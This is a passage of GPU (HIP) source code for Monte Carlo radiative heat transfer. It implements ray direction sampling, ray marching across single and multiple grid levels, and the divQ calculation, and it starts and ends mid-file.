} #endif //===========TESTING========== } // boundary faces loop } //end if checking for intrusions //move to the next cell threadID += blockDim.x; origin.x = (threadID % finePatchSize.x) + finePatch.lo.x; origin.y = ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y; origin.z = (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z; } // while loop } //______________________________________________________________________ // S O L V E D I V Q //______________________________________________________________________ if( RT_flags.solveDivQ ) { // GPU equivalent of GridIterator loop - calculate sets of rays per thread int3 finePatchSize = make_int3(finePatch.hi.x - finePatch.lo.x, finePatch.hi.y - finePatch.lo.y, finePatch.hi.z - finePatch.lo.z); unsigned short threadID = threadIdx.x + RT_flags.startCell; GPUIntVector origin = make_int3((threadID % finePatchSize.x) + finePatch.lo.x, ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y, (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z); while (threadID < RT_flags.endCell) { // don't compute in intrusions and walls if(cellType[fineL][origin] != d_flowCell ){ continue; } GPUPoint CC_pos = d_levels[fineL].getCellPosition(origin); #if( DEBUG == 1 ) if( isDbgCellDevice( origin ) ){ printf(" origin[%i,%i,%i] finePatchID: %i \n", origin.x, origin.y, origin.z, finePatch.ID); } #endif double sumI = 0; //__________________________________ // ray loop #pragma unroll for (int iRay = 0; iRay < RT_flags.nDivQRays; iRay++) { GPUVector ray_direction; if ( doLatinHyperCube ){ // Latin-Hyper-Cube sampling ray_direction = findRayDirectionHyperCubeDevice(randNumStates, RT_flags.nDivQRays, rand_i[iRay], iRay ); }else{ // Naive Monte-Carlo sampling ray_direction = findRayDirectionDevice( randNumStates ); } GPUVector rayOrigin = rayOriginDevice( randNumStates, CC_pos, d_levels[fineL].Dx , RT_flags.CCRays ); updateSumI_MLDevice<T>(ray_direction, rayOrigin, origin, gridP, fineLevel_ROI_Lo, fineLevel_ROI_Hi, regionLo, regionHi, sigmaT4OverPi, abskg, cellType, sumI, randNumStates, RT_flags); } //Ray loop //__________________________________ // Compute divQ divQ_fine[origin] = -4.0 * M_PI * abskg[fineL][origin] * ( sigmaT4OverPi[fineL][origin] - (sumI/RT_flags.nDivQRays) ); // radiationVolq is the incident energy per cell (W/m^3) and is necessary when particle heat transfer models (i.e. Shaddix) are used radiationVolQ_fine[origin] = 4.0 * M_PI * (sumI/RT_flags.nDivQRays); #if (DEBUG == 1) if( isDbgCellDevice(origin) ){ printf( "\n [%d, %d, %d] sumI: %g divQ: %g radiationVolq: %g abskg: %g, sigmaT4: %g \n", origin.x, origin.y, origin.z, sumI,divQ_fine[origin], radiationVolQ_fine[origin],abskg[fineL][origin], sigmaT4OverPi[fineL][origin]); } #endif //move to the next cell threadID += blockDim.x; origin.x = (threadID % finePatchSize.x) + finePatch.lo.x; origin.y = ((threadID % (finePatchSize.x * finePatchSize.y)) / (finePatchSize.x)) + finePatch.lo.y; origin.z = (threadID / (finePatchSize.x * finePatchSize.y)) + finePatch.lo.z; //printf("Got [%d,%d,%d] from %d on counter %d\n", origin.x, origin.y, origin.z, threadID, cellCounter); } // end while loop } // solve divQ } //______________________________________________________________________ // //______________________________________________________________________ __device__ GPUVector findRayDirectionDevice( hiprandState_t* randNumStates ) { // Random Points On Sphere // add fuzz to prevent infs in 1/dirVector calculation double plusMinus_one = 2.0 * randDblExcDevice( randNumStates ) - 1.0 + DBL_EPSILON; double r = sqrt(1.0 - plusMinus_one * plusMinus_one); // Radius of circle at z double theta = 2.0 * M_PI * randDblExcDevice( randNumStates ); // Uniform betwen 0-2Pi GPUVector dirVector; dirVector.x = r*cos(theta); // Convert to cartesian coordinates dirVector.y = r*sin(theta); dirVector.z = plusMinus_one; #if ( FIXED_RAY_DIR == 1) dirVector = make_double3(0.707106781186548, 0.707106781186548, 0.) * SIGN; #elif ( FIXED_RAY_DIR == 2 ) dirVector = make_double3(0.707106781186548, 0.0, 0.707106781186548) * SIGN; #elif ( FIXED_RAY_DIR == 3 ) dirVector = make_double3(0.0, 0.707106781186548, 0.707106781186548) * SIGN; #elif ( FIXED_RAY_DIR == 4 ) dirVector = make_double3(0.707106781186548, 0.707106781186548, 0.707106781186548) * SIGN; #elif ( FIXED_RAY_DIR == 5 ) dirVector = make_double3(1, 0, 0) * SIGN; #elif ( FIXED_RAY_DIR == 6 ) dirVector = make_double3(0, 1, 0) * SIGN; #elif ( FIXED_RAY_DIR == 7 ) dirVector = make_double3(0, 0, 1) * SIGN; #else #endif return dirVector; } //______________________________________________________________________ // Uses stochastically selected regions in polar and azimuthal space to // generate the Monte-Carlo directions. Samples Uniformly on a hemisphere // and as hence does not include the cosine in the sample. //______________________________________________________________________ __device__ void rayDirectionHyperCube_cellFaceDevice(hiprandState_t* randNumStates, const GPUIntVector& origin, const int3& indexOrder, const int3& signOrder, const int iRay, GPUVector& dirVector, double& cosTheta, const int bin_i, const int bin_j, const int nFluxRays) { // randomly sample within each randomly selected region (may not be needed, alternatively choose center of subregion) cosTheta = (randDblExcDevice(randNumStates) + (double) bin_i)/(double)nFluxRays; double theta = acos(cosTheta); // polar angle for the hemisphere double phi = 2.0 * M_PI * (randDblExcDevice(randNumStates) + (double) bin_j)/(double)nFluxRays; // Uniform betwen 0-2Pi cosTheta = cos(theta); //Convert to Cartesian GPUVector tmp; tmp[0] = sin(theta) * cos(phi); tmp[1] = sin(theta) * sin(phi); tmp[2] = cosTheta; //Put direction vector as coming from correct face, dirVector[0] = tmp[indexOrder.x] * signOrder.x; dirVector[1] = tmp[indexOrder.y] * signOrder.y; dirVector[2] = tmp[indexOrder.z] * signOrder.z; } //______________________________________________________________________ // __device__ GPUVector findRayDirectionHyperCubeDevice(hiprandState_t* randNumStates, const int nDivQRays, const int bin_i, const int bin_j) { // Random Points On Sphere double plusMinus_one = 2.0 *(randDblExcDevice( randNumStates ) + (double) bin_i)/nDivQRays - 1.0; // Radius of circle at z double r = sqrt(1.0 - plusMinus_one * plusMinus_one); // Uniform betwen 0-2Pi double phi = 2.0 * M_PI * (randDblExcDevice( randNumStates ) + (double) bin_j)/nDivQRays; GPUVector dirVector; dirVector[0] = r*cos(phi); // Convert to cartesian dirVector[1] = r*sin(phi); dirVector[2] = plusMinus_one; return dirVector; } //______________________________________________________________________ // Populate vector with integers which have been randomly shuffled. // This is sampling without replacement and can be used to in a // Latin-Hyper-Cube sampling scheme. The algorithm used is the // modern Fisher-Yates shuffle. //______________________________________________________________________ __device__ void randVectorDevice( int int_array[], const int size, hiprandState_t* randNumStates ){ for (int i=0; i<size; i++){ // populate sequential array from 0 to size-1 int_array[i] = i; } for (int i=size-1; i>0; i--){ // fisher-yates shuffle starting with size-1 int rand_int = randIntDevice(randNumStates, i); // Random number between 0 & i int swap = int_array[i]; int_array[i] = int_array[rand_int]; int_array[rand_int] = swap; } } //______________________________________________________________________ // Compute the Ray direction from a cell face __device__ void rayDirection_cellFaceDevice( hiprandState_t* randNumStates, const GPUIntVector& origin, const GPUIntVector& indexOrder, const GPUIntVector& signOrder, const int iRay, GPUVector& directionVector, double& cosTheta ) { // Surface Way to generate a ray direction from the positive z face double phi = 2 * M_PI * randDblDevice(randNumStates); // azimuthal angle. Range of 0 to 2pi double theta = acos(randDblDevice(randNumStates)); // polar angle for the hemisphere cosTheta = cos(theta); double sinTheta = sin(theta); //Convert to Cartesian GPUVector tmp; tmp[0] = sinTheta * cos(phi); tmp[1] = sinTheta * sin(phi); tmp[2] = cosTheta; // Put direction vector as coming from correct face, directionVector[0] = tmp[indexOrder[0]] * signOrder[0]; directionVector[1] = tmp[indexOrder[1]] * signOrder[1]; directionVector[2] = tmp[indexOrder[2]] * signOrder[2]; } //______________________________________________________________________ // Compute the physical location of a ray's origin __device__ GPUVector rayOriginDevice( hiprandState_t* randNumStates, const GPUPoint CC_pos, const GPUVector dx, const bool useCCRays) { GPUVector rayOrigin; if( useCCRays == false ){ rayOrigin[0] = CC_pos.x - 0.5*dx.x + randDblDevice(randNumStates) * dx.x; rayOrigin[1] = CC_pos.y - 0.5*dx.y + randDblDevice(randNumStates) * dx.y; rayOrigin[2] = CC_pos.z - 0.5*dx.z + randDblDevice(randNumStates) * dx.z; }else{ rayOrigin[0] = CC_pos.x; rayOrigin[1] = CC_pos.y; rayOrigin[2] = CC_pos.z; } return rayOrigin; } //______________________________________________________________________ // Compute the Ray location from a cell face __device__ void rayLocation_cellFaceDevice( hiprandState_t* randNumStates, const GPUIntVector& origin, const GPUIntVector &indexOrder, const GPUIntVector &shift, const double &DyDx, const double &DzDx, GPUVector& location ) { GPUVector tmp; tmp[0] = randDblDevice(randNumStates); tmp[1] = 0; tmp[2] = randDblDevice(randNumStates) * DzDx; // Put point on correct face location[0] = tmp[indexOrder[0]] + (double)shift[0]; location[1] = tmp[indexOrder[1]] + (double)shift[1] * DyDx; location[2] = tmp[indexOrder[2]] + (double)shift[2] * DzDx; location[0] += (double)origin.x; location[1] += (double)origin.y; location[2] += (double)origin.z; } //______________________________________________________________________ // // Compute the Ray location on a cell face __device__ void rayLocation_cellFaceDevice( hiprandState_t* randNumStates, const int face, const GPUVector Dx, const GPUPoint CC_pos, GPUVector& rayOrigin) { double cellOrigin[3]; // left, bottom, back corner of the cell cellOrigin[X] = CC_pos.x - 0.5 * Dx[X]; cellOrigin[Y] = CC_pos.y - 0.5 * Dx[Y]; cellOrigin[Z] = CC_pos.z - 0.5 * Dx[Z]; switch(face) { case WEST: rayOrigin[X] = cellOrigin[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case EAST: rayOrigin[X] = cellOrigin[X] + Dx[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case SOUTH: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case NORTH: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y] + Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + randDblDevice(randNumStates) * Dx[Z]; break; case BOT: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z]; break; case TOP: rayOrigin[X] = cellOrigin[X] + randDblDevice(randNumStates) * Dx[X]; rayOrigin[Y] = cellOrigin[Y] + randDblDevice(randNumStates) * Dx[Y]; rayOrigin[Z] = cellOrigin[Z] + Dx[Z]; break; default: // throw InternalError("Ray::rayLocation_cellFace, Invalid FaceType Specified", __FILE__, __LINE__); return; } } //______________________________________________________________________ // __device__ bool has_a_boundaryDevice(const GPUIntVector &c, const GPUGridVariable<int>& celltype, BoundaryFaces &boundaryFaces){ GPUIntVector adj = c; bool hasBoundary = false; adj[0] = c[0] - 1; // west if ( celltype[adj]+1 ){ // cell type of flow is -1, so when cellType+1 isn't false, we boundaryFaces.addFace( WEST ); // know we're at a boundary hasBoundary = true; } adj[0] += 2; // east if ( celltype[adj]+1 ){ boundaryFaces.addFace( EAST ); hasBoundary = true; } adj[0] -= 1; adj[1] = c[1] - 1; // south if ( celltype[adj]+1 ){ boundaryFaces.addFace( SOUTH ); hasBoundary = true; } adj[1] += 2; // north if ( celltype[adj]+1 ){ boundaryFaces.addFace( NORTH ); hasBoundary = true; } adj[1] -= 1; adj[2] = c[2] - 1; // bottom if ( celltype[adj]+1 ){ boundaryFaces.addFace( BOT ); hasBoundary = true; } adj[2] += 2; // top if ( celltype[adj]+1 ){ boundaryFaces.addFace( TOP ); hasBoundary = true; } return (hasBoundary); } //______________________________________________________________________ // //______________________________________________________________________ __device__ void raySignStepDevice(GPUVector& sign, int cellStep[], const GPUVector& inv_direction_vector) { // get new step and sign for ( int d=0; d<3; d++){ double me = copysign((double)1.0, inv_direction_vector[d]); // +- 1 sign[d] = fmax(0.0, me); // 0, 1 cellStep[d] = int(me); } } //______________________________________________________________________ // __device__ bool containsCellDevice( GPUIntVector low, GPUIntVector high, GPUIntVector cell, const int dir) { return low[dir] <= cell[dir] && high[dir] > cell[dir]; } //______________________________________________________________________ // // used by dataOnion it will be replaced __device__ void reflect(double& fs, GPUIntVector& cur, GPUIntVector& prevCell, const double abskg, bool& in_domain, int& step, double& sign, double& ray_direction) { fs = fs * (1 - abskg); //put cur back inside the domain cur = prevCell; in_domain = true; // apply reflection condition step *= -1; // begin stepping in opposite direction sign *= -1; ray_direction *= -1; } //______________________________________________________________________ template< class T > __device__ void updateSumIDevice ( levelParams level, GPUVector& ray_direction, GPUVector& ray_origin, const GPUIntVector& origin, const GPUVector& Dx, const GPUGridVariable< T >& sigmaT4OverPi, const GPUGridVariable< T >& abskg, const GPUGridVariable<int>& celltype, double& sumI, hiprandState_t* randNumStates, RMCRT_flags RT_flags) { GPUIntVector cur = origin; GPUIntVector prevCell = cur; // Step and sign for ray marching int step[3]; // Gives +1 or -1 based on sign GPUVector sign; // is 0 for negative ray direction GPUVector inv_ray_direction = 1.0/ray_direction; #if DEBUG == 1 if( isDbgCellDevice(origin) ) { printf(" updateSumI: [%d,%d,%d] ray_dir [%g,%g,%g] ray_loc [%g,%g,%g]\n", origin.x, origin.y, origin.z,ray_direction.x, ray_direction.y, ray_direction.z, ray_origin.x, ray_origin.y, ray_origin.z); } #endif raySignStepDevice(sign, step, ray_direction); GPUPoint CC_pos = level.getCellPosition(origin); // rayDx is the distance from bottom, left, back, corner of cell to ray GPUVector rayDx; rayDx[0] = ray_origin.x - ( CC_pos.x - 0.5*Dx.x ); // this can be consolidated using GPUVector rayDx[1] = ray_origin.y - ( CC_pos.y - 0.5*Dx.y ); rayDx[2] = ray_origin.z - ( CC_pos.z - 0.5*Dx.z ); GPUVector tMax; tMax.x = (sign.x * Dx.x - rayDx.x) * inv_ray_direction.x; tMax.y = (sign.y * Dx.y - rayDx.y) * inv_ray_direction.y; tMax.z = (sign.z * Dx.z - rayDx.z) * inv_ray_direction.z; //Length of t to traverse one cell GPUVector tDelta; tDelta = Abs(inv_ray_direction) * Dx; //Initializes the following values for each ray bool in_domain = true; double tMax_prev = 0; double intensity = 1.0; double fs = 1.0; int nReflect = 0; // Number of reflections double optical_thickness = 0; double expOpticalThick_prev = 1.0; double rayLength = 0.0; GPUVector ray_location = ray_origin; #ifdef RAY_SCATTER double scatCoeff = RT_flags.sigmaScat; //[m^-1] !! HACK !! This needs to come from data warehouse if (scatCoeff == 0) scatCoeff = 1e-99; // avoid division by zero // Determine the length at which scattering will occur // See CCA/Components/Arches/RMCRT/PaulasAttic/MCRT/ArchesRMCRT/ray.cc double scatLength = -log( randDblExcDevice( randNumStates ) ) / scatCoeff; #endif //+++++++Begin ray tracing+++++++++++++++++++ //Threshold while loop while ( intensity > RT_flags.threshold ){ DIR dir = NONE; while (in_domain){ prevCell = cur; double disMin = -9; // Represents ray segment length. //__________________________________ // Determine which cell the ray will enter next dir = NONE; if ( tMax.x < tMax.y ){ // X < Y if ( tMax.x < tMax.z ){ // X < Z dir = X; } else { dir = Z; } } else { if( tMax.y < tMax.z ){ // Y < Z dir = Y; } else { dir = Z; } } //__________________________________ // update marching variables cur[dir] = cur[dir] + step[dir]; disMin = (tMax[dir] - tMax_prev); tMax_prev = tMax[dir]; tMax[dir] = tMax[dir] + tDelta[dir]; rayLength += disMin; ray_location.x = ray_location.x + (disMin * ray_direction.x); ray_location.y = ray_location.y + (disMin * ray_direction.y); ray_location.z = ray_location.z + (disMin * ray_direction.z); in_domain = (celltype[cur] == d_flowCell); optical_thickness += abskg[prevCell]*disMin; RT_flags.nRaySteps ++; #if ( DEBUG >= 1 ) if( isDbgCellDevice(origin) ){ printf( " cur [%d,%d,%d] prev [%d,%d,%d] ", cur.x, cur.y, cur.z, prevCell.x, prevCell.y, prevCell.z); printf( " dir %d ", dir ); printf( "tMax [%g,%g,%g] ",tMax.x,tMax.y, tMax.z); printf( "rayLoc [%g,%g,%g] ",ray_location.x,ray_location.y, ray_location.z); printf( "distanceTraveled %g tMax[dir]: %g tMax_prev: %g, Dx[dir]: %g\n",disMin, tMax[dir], tMax_prev, Dx[dir]); printf( " tDelta [%g,%g,%g] \n",tDelta.x, tDelta.y, tDelta.z); // printf( " abskg[prev] %g \t sigmaT4OverPi[prev]: %g \n",abskg[prevCell], sigmaT4OverPi[prevCell]); // printf( " abskg[cur] %g \t sigmaT4OverPi[cur]: %g \t cellType: %i\n",abskg[cur], sigmaT4OverPi[cur], celltype[cur] ); printf( " optical_thickkness %g \t rayLength: %g\n", optical_thickness, rayLength); } #endif //Eqn 3-15(see below reference) while //Third term inside the parentheses is accounted for in Inet. Chi is accounted for in Inet calc. double expOpticalThick = exp(-optical_thickness); sumI += sigmaT4OverPi[prevCell] * ( expOpticalThick_prev - expOpticalThick ) * fs; expOpticalThick_prev = expOpticalThick; #ifdef RAY_SCATTER if ( (rayLength > scatLength) && in_domain){ // get new scatLength for each scattering event scatLength = -log( randDblExcDevice( randNumStates ) ) / scatCoeff; ray_direction = findRayDirectionDevice( randNumStates ); inv_ray_direction = 1.0/ray_direction; // get new step and sign int stepOld = step[dir]; raySignStepDevice( sign, step, ray_direction); // if sign[dir] changes sign, put ray back into prevCell (back scattering) // a sign change only occurs when the product of old and new is negative if( step[dir] * stepOld < 0 ){ cur = prevCell; } GPUPoint CC_pos = level.getCellPosition(cur); // rayDx is the distance from bottom, left, back, corner of cell to ray rayDx[0] = ray_origin.x - ( CC_pos.x - 0.5*Dx.x ); // this can be consolidated using GPUVector rayDx[1] = ray_origin.y - ( CC_pos.y - 0.5*Dx.y ); rayDx[2] = ray_origin.z - ( CC_pos.z - 0.5*Dx.z ); tMax.x = (sign.x * Dx.x - rayDx.x) * inv_ray_direction.x; tMax.y = (sign.y * Dx.y - rayDx.y) * inv_ray_direction.y; tMax.z = (sign.z * Dx.z - rayDx.z) * inv_ray_direction.z; // Length of t to traverse one cell tDelta = Abs(inv_ray_direction) * Dx; tMax_prev = 0; rayLength = 0; // allow for multiple scattering events per ray #if (DEBUG == 3) if( isDbgCellDevice( origin) ){ printf( " Scatter: [%i, %i, %i], rayLength: %g, tmax: %g, %g, %g tDelta: %g, %g, %g ray_dir: %g, %g, %g\n",cur.x, cur.y, cur.z,rayLength, tMax[0], tMax[1], tMax[2], tDelta.x, tDelta.y , tDelta.z, ray_direction.x, ray_direction.y , ray_direction.z); printf( " dir: %i sign: [%g, %g, %g], step [%i, %i, %i] cur: [%i, %i, %i], prevCell: [%i, %i, %i]\n", dir, sign[0], sign[1], sign[2], step[0], step[1], step[2], cur[0], cur[1], cur[2], prevCell[0], prevCell[1], prevCell[2] ); printf( " ray_location: [%g, %g, %g]\n", rayLocation[0], rayLocation[1], rayLocation[2] ); // printf(" rayDx [%g, %g, %g] CC_pos[%g, %g, %g]\n", rayDx[0], rayDx[1], rayDx[2], CC_pos.x, CC_pos.y, CC_pos.z); } #endif } #endif } //end domain while loop. // wall emission 12/15/11 double wallEmissivity = abskg[cur]; if (wallEmissivity > 1.0){ // Ensure wall emissivity doesn't exceed one. wallEmissivity = 1.0; } intensity = exp(-optical_thickness); sumI += wallEmissivity * sigmaT4OverPi[cur] * intensity; intensity = intensity * fs; // when a ray reaches the end of the domain, we force it to terminate. if( !RT_flags.allowReflect ){ intensity = 0; } #if DEBUG >0 if( isDbgCellDevice(origin) ){ printf( " cur [%d,%d,%d] intensity: %g expOptThick: %g, fs: %g allowReflect: %i \n", cur.x, cur.y, cur.z, intensity, exp(-optical_thickness), fs, RT_flags.allowReflect ); } #endif //__________________________________ // Reflections if ( (intensity > RT_flags.threshold) && RT_flags.allowReflect){ reflect( fs, cur, prevCell, abskg[cur], in_domain, step[dir], sign[dir], ray_direction[dir]); ++nReflect; } } // threshold while loop. } // end of updateSumI function //______________________________________________________________________ // Multi-level template< class T> __device__ void updateSumI_MLDevice ( GPUVector& ray_direction, GPUVector& ray_origin, const GPUIntVector& origin, gridParams gridP, const GPUIntVector& fineLevel_ROI_Lo, const GPUIntVector& fineLevel_ROI_Hi, const int3* regionLo, const int3* regionHi, const GPUGridVariable< T >* sigmaT4OverPi, const GPUGridVariable< T >* abskg, const GPUGridVariable<int>* cellType, double& sumI, hiprandState_t* randNumStates, RMCRT_flags RT_flags ) { int maxLevels = gridP.maxLevels; // for readability int L = maxLevels - 1; // finest level int prevLev = L; GPUIntVector cur = origin; GPUIntVector prevCell = cur; // Step and sign for ray marching int step[3]; // Gives +1 or -1 based on sign GPUVector sign; GPUVector inv_ray_direction = 1.0 / ray_direction; #if DEBUG == 1 if( isDbgCellDevice(origin) ) { printf(" updateSumI_ML: [%d,%d,%d] ray_dir [%g,%g,%g] ray_loc [%g,%g,%g]\n", origin.x, origin.y, origin.z,ray_direction.x, ray_direction.y, ray_direction.z, ray_origin.x, ray_origin.y, ray_origin.z); } #endif raySignStepDevice(sign, step, inv_ray_direction); //__________________________________ // define tMax & tDelta on all levels // go from finest to coarset level so you can compare // with 1L rayTrace results. GPUPoint CC_posOrigin = d_levels[L].getCellPosition(origin); // rayDx is the distance from bottom, left, back, corner of cell to ray GPUVector rayDx; GPUVector Dx = d_levels[L].Dx; rayDx[0] = ray_origin.x - ( CC_posOrigin.x - 0.5*Dx.x ); // this can be consolidated using GPUVector rayDx[1] = ray_origin.y - ( CC_posOrigin.y - 0.5*Dx.y ); rayDx[2] = ray_origin.z - ( CC_posOrigin.z - 0.5*Dx.z ); GPUVector tMaxV; tMaxV.x = (sign.x * Dx.x - rayDx.x) * inv_ray_direction.x; tMaxV.y = (sign.y * Dx.y - rayDx.y) * inv_ray_direction.y; tMaxV.z = (sign.z * Dx.z - rayDx.z) * inv_ray_direction.z; GPUVector tDelta[d_MAXLEVELS]; for (int Lev = maxLevels - 1; Lev > -1; Lev--) { //Length of t to traverse one cell tDelta[Lev].x = fabs(inv_ray_direction[0]) * d_levels[Lev].Dx.x; tDelta[Lev].y = fabs(inv_ray_direction[1]) * d_levels[Lev].Dx.y; tDelta[Lev].z = fabs(inv_ray_direction[2]) * d_levels[Lev].Dx.z; } //Initializes the following values for each ray bool in_domain = true; GPUVector tMaxV_prev = make_double3(0.0,0.0,0.0); double old_length = 0.0; double intensity = 1.0; double fs = 1.0; int nReflect = 0; // Number of reflections bool onFineLevel = true; double optical_thickness = 0; double expOpticalThick_prev = 1.0; double rayLength = 0.0; GPUVector ray_location = ray_origin; GPUPoint CC_pos = CC_posOrigin; //______________________________________________________________________ // Threshold loop while (intensity > RT_flags.threshold) { DIR dir = NONE; while (in_domain) { prevCell = cur; prevLev = L; //__________________________________ // Determine the princple direction the ray is traveling // dir = NONE; if (tMaxV.x < tMaxV.y) { // X < Y if (tMaxV.x < tMaxV.z) { // X < Z dir = X; } else { dir = Z; } } else { if (tMaxV.y < tMaxV.z) { // Y < Z dir = Y; } else { dir = Z; } } // next cell index and position cur[dir] = cur[dir] + step[dir]; //__________________________________ // Logic for moving between levels // - Currently you can only move from fine to coarse level // - Don't jump levels if ray is at edge of domain CC_pos = d_levels[L].getCellPosition(cur); in_domain = gridP.domain_BB.inside(CC_pos); // position could be outside of domain bool ray_outside_ROI = ( containsCellDevice(fineLevel_ROI_Lo, fineLevel_ROI_Hi, cur, dir) == false ); bool ray_outside_Region = ( containsCellDevice(regionLo[L], regionHi[L], cur, dir) == false ); bool jumpFinetoCoarserLevel = ( onFineLevel && ray_outside_ROI && in_domain ); bool jumpCoarsetoCoarserLevel = ( (onFineLevel == false) && ray_outside_Region && (L > 0) && in_domain ); //#define ML_DEBUG #if ( (DEBUG == 1 || DEBUG == 4) && defined(ML_DEBUG) ) if( isDbgCellDevice(origin) ) { printf( " Ray: [%i,%i,%i] **jumpFinetoCoarserLevel %i jumpCoarsetoCoarserLevel %i containsCell: %i ", cur.x, cur.y, cur.z, jumpFinetoCoarserLevel, jumpCoarsetoCoarserLevel, containsCellDevice(fineLevel_ROI_Lo, fineLevel_ROI_Hi, cur, dir)); printf( " onFineLevel: %i ray_outside_ROI: %i ray_outside_Region: %i in_domain: %i\n", onFineLevel, ray_outside_ROI, ray_outside_Region,in_domain ); printf( " L: %i regionLo: [%i,%i,%i], regionHi: [%i,%i,%i]\n",L,regionLo[L].x,regionLo[L].y,regionLo[L].z, regionHi[L].x,regionHi[L].y,regionHi[L].z); } #endif if (jumpFinetoCoarserLevel) { cur = d_levels[L].mapCellToCoarser(cur); L = d_levels[L].getCoarserLevelIndex(); // move to a coarser level onFineLevel = false; #if ( (DEBUG == 1 || DEBUG == 4) && defined(ML_DEBUG) ) if( isDbgCellDevice(origin) ) { printf( " ** Jumping off fine patch switching Levels: prev L: %i, L: %i, cur: [%i,%i,%i] \n",prevLev, L, cur.x, cur.y, cur.z); } #endif } else if (jumpCoarsetoCoarserLevel) { //GPUIntVector c_old = cur; // needed for debugging cur = d_levels[L].mapCellToCoarser(cur); L = d_levels[L].getCoarserLevelIndex(); // move to a coarser level #if ( (DEBUG == 1 || DEBUG == 4) && defined(ML_DEBUG) ) if( isDbgCellDevice(origin) ) { printf( " ** Switching Levels: prev L: %i, L: %i, cur: [%i,%i,%i], c_old: [%i,%i,%i]\n",prevLev, L, cur.x, cur.y, cur.z, c_old.x, c_old.y, c_old.z); } #endif } //__________________________________ // update marching variables double distanceTraveled = (tMaxV[dir] - old_length); old_length = tMaxV[dir]; tMaxV_prev = tMaxV; tMaxV[dir] = tMaxV[dir] + tDelta[L][dir]; ray_location.x = ray_location.x + ( distanceTraveled * ray_direction.x ); ray_location.y = ray_location.y + ( distanceTraveled * ray_direction.y ); ray_location.z = ray_location.z + ( distanceTraveled * ray_direction.z ); //__________________________________ // when moving to a coarse level tmax will change only in the direction the ray is moving if ( jumpFinetoCoarserLevel || jumpCoarsetoCoarserLevel ){ GPUVector dx = d_levels[L].Dx; double rayDx_Level = ray_location[dir] - ( CC_pos[dir] - 0.5*dx[dir] ); double tMax_tmp = ( sign[dir] * dx[dir] - rayDx_Level ) * inv_ray_direction[dir]; tMaxV = tMaxV_prev; tMaxV[dir] += tMax_tmp; #if DEBUG >0 if( isDbgCellDevice(origin) ) { printf(" Jumping from fine to coarse level: rayDxLevel: %g tmax_tmp: %g dir: %i, CC_pos[dir] %g\n", rayDx_Level, tMax_tmp,dir, CC_pos[dir]); } #endif } // if the cell isn't a flow cell then terminate the ray in_domain = in_domain && (cellType[L][cur] == d_flowCell) ; rayLength += distanceTraveled; optical_thickness += abskg[prevLev][prevCell] * distanceTraveled; double expOpticalThick = exp(-optical_thickness); #if DEBUG == 1 // This sucks --Todd if( isDbgCellDevice(origin) ) { printf( " cur [%d,%d,%d] prev [%d,%d,%d]", cur.x, cur.y, cur.z, prevCell.x, prevCell.y, prevCell.z); printf( " dir %d ", dir ); // printf( " stepSize [%i,%i,%i] ",step[0],step[1],step[2]); printf( "tMaxV [%g,%g,%g] ", tMaxV[0],tMaxV[1], tMaxV[2]); printf( "rayLoc [%4.5f,%4.5f,%4.5f] ",ray_location.x,ray_location.y, ray_location.z); printf( "\tdistanceTraveled %4.5f tMaxV[dir]: %g tMaxV_prev[dir]: %g , Dx[dir]: %g\n",distanceTraveled, tMaxV[dir], tMaxV_prev[dir], d_levels[L].Dx[dir]); printf( " tDelta [%g,%g,%g] \n",tDelta[L].x,tDelta[L].y, tDelta[L].z); // printf( "inv_dir [%g,%g,%g] ",inv_direction.x(),inv_direction.y(), inv_direction.z()); // printf( " abskg[prev] %g \t sigmaT4OverPi[prev]: %g \n",abskg[prevLev][prevCell], sigmaT4OverPi[prevLev][prevCell]); // printf( " abskg[cur] %g \t sigmaT4OverPi[cur]: %g \t cellType: %i \n",abskg[L][cur], sigmaT4OverPi[L][cur], cellType[L][cur]); // printf( " Dx[prevLev].x %g \n", Dx[prevLev].x() ); printf( " optical_thickkness %g \t rayLength: %g \tSumI %g\n", optical_thickness, rayLength, sumI); } #endif sumI += sigmaT4OverPi[prevLev][prevCell] * (expOpticalThick_prev - expOpticalThick) * fs; expOpticalThick_prev = expOpticalThick; } //end domain while loop. ++++++++++++++ //__________________________________ // double wallEmissivity = abskg[L][cur]; if (wallEmissivity > 1.0) { // Ensure wall emissivity doesn't exceed one. wallEmissivity = 1.0; } intensity = exp(-optical_thickness); sumI += wallEmissivity * sigmaT4OverPi[L][cur] * intensity; intensity = intensity * fs; // when a ray reaches the end of the domain, we force it to terminate. if (!RT_flags.allowReflect){ intensity = 0; } #if DEBUG == 1 if( isDbgCellDevice(origin) ) { printf( " C) intensity: %g OptThick: %g, fs: %g allowReflect: %i\n", intensity, optical_thickness, fs, RT_flags.allowReflect ); } #endif //__________________________________ // Reflections if ((intensity > RT_flags.threshold) && RT_flags.allowReflect) { reflect(fs, cur, prevCell, abskg[L][cur], in_domain, step[dir], sign[dir], ray_direction[dir]); ++nReflect; } } // threshold while loop. } // end of updateSumI function //______________________________________________________________________ // Returns random number between 0 & 1.0 including 0 & 1.0 // See src/Core/Math/MersenneTwister.h for equation //______________________________________________________________________ __device__ double randDblDevice(hiprandState_t* globalState) { int blockId = blockIdx.x + blockIdx.y * gridDim.x + gridDim.x * gridDim.y * blockIdx.z; int tid = blockId * blockDim.x * blockDim.y * blockDim.z + threadIdx.z * blockDim.y * blockDim.x + threadIdx.y * blockDim.x + threadIdx.x; hiprandState_t localState = globalState[tid]; double val = hiprand(&localState); globalState[tid] = localState; #ifdef FIXED_RANDOM_NUM return 0.3; #else return (double)val * 